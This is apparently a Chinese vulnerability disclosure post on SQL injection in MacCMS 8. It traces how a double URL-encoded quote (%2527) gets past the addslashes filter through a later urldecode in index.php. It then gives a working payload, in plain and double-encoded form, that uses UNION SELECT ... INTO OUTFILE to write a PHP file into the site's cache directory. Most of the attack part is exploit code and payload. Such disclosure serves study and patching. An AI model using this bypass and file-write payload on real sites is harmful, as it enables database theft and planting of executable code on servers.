漏洞作者: 路人甲
首先我们进入入口文件index.php:
[php]
$m = be('get','m');
if(strpos($m,'.')){ $m = substr($m,0,strpos($m,'.')); }
$par = explode('-',$m);
$parlen = count($par);
$ac = $par[0];
if(empty($ac)){ $ac='vod'; $method='index'; }
$colnum = array("id","pg","yaer","typeid","classid");
if($parlen>=2){
$method = $par[1];
for($i=2;$i<$parlen;$i+=2){
$tpl->P[$par[$i]] = in_array($par[$i],$colnum) ? intval($par[$i+1]) : urldecode($par[$i+1]);
}
}
if($tpl->P['pg']<1){ $tpl->P['pg']=1; }
[/php]
追踪be函数,代码如下:
[php]
function be($mode,$key,$sp=',')
{
ini_set("magic_quotes_runtime", 0);
$magicq= get_magic_quotes_gpc();
switch($mode)
{
case 'post':
$res=isset($_POST[$key]) ? $magicq?$_POST[$key]:@addslashes($_POST[$key]) : '';
break;
case 'get':
$res=isset($_GET[$key]) ? $magicq?$_GET[$key]:@addslashes($_GET[$key]) : '';
break;
case 'arr':
$arr =isset($_POST[$key]) ? $_POST[$key] : '';
if($arr==""){
$value="0";
}
else{
for($i=0;$i<count($arr);$i++){
$res=implode($sp,$arr);
}
}
break;
default:
$res=isset($_REQUEST[$key]) ? $magicq ? $_REQUEST[$key] : @addslashes($_REQUEST[$key]) : '';
break;
}
return $res;
}
[/php]
发现这里对特殊字符进行了addslashes,那么我们%2527传递到这里就是一个%27,那么就不会被过滤,然后我们逃出来看看,神奇的地方,必有神奇的写法
[php]
for($i=2;$i<$parlen;$i+=2){
$tpl->P[$par[$i]] = in_array($par[$i],$colnum) ? intval($par[$i+1]) : urldecode($par[$i+1]);
}
[/php]
看见了没有这里又进行了urldecode,所以大家都明白了怎么绕过这个cms了,下来我们找一个文件,gbook.php:
[php]
$tpl->P['cn'] = 'gbook'.$tpl->P['pg'];
//echoPageCache($tpl->P['cp'],$tpl->P['cn']);
$tpl->H = loadFile(MAC_ROOT."/template/".$MAC['site']['templatedir']."/".$MAC['site']['htmldir']."/home_gbook.html");
$db = new AppDb($MAC['db']['server'],$MAC['db']['user'],$MAC['db']['pass'],$MAC['db']['name']);
$tpl->mark();
$tpl->H = str_replace("{maccms:gbookverify}", $MAC['other']['gbookverify'] ,$tpl->H);
if(strpos($tpl->H,'{maccms:count_gbook_all}')){
$tpl->H = str_replace("{maccms:
[/php]
这里有一个mark函数,然后我们跟踪进去发现里面有一个sql操作的函数
[php]
$this->markname = $matches1[1][$i];
$this->markpar = $matches1[2][$i];
$this->markdes = $matches1[3][$i];
$this->mark_sql();
switch($this->markname)
{
[/php]
再次跟进去mark_sql()函数,我们就明白了 这里进行了select查询,那么接下来我们构造sql语句,由于cms是一个伪静态页面的访问,全部由index.php分发:
url
[php]
http://192.168.10.70/maccms8_mfb_/maccms8_mfb/index.php?m=gbook-show-wd-ss11s') union select 1,2,3,user(),version(),"<?php phpinfo()?>",NULL,NULL,NULL into outfile 'E:/wamp/www/maccms8_mfb_/maccms8_mfb/cache/userinfo'#ORDER BY g_time desc limit 0,10
[/php]
根据上面的分析,我们对m后面的参数进行两次url编码:
[php]
http://192.168.10.70/maccms8_mfb_/maccms8_mfb/index.php?m=gbook-show-wd-ss11s%2527%2529%2520union%2520select%25201%252C2%252C3%252Cuser%2528%2529%252Cversion%2528%2529%252C%2522%253C%253Fphp%2520phpinfo%2528%2529%253F%253E%2522%252CNULL%252CNULL%252CNULL%2520into%2520outfile%2520%2527E%253A%252fwamp%252fwww%252fmaccms8_mfb_%252fmaccms8_mfb%252fcache%252fuserinfo%2527%2523ORDER%2520BY%2520g_time%2520desc%2520limit%25200%252C10
[/php]
请求后我们,发现如图:
我们然后去访问我们生成的文件:
网站做的不错,继续学习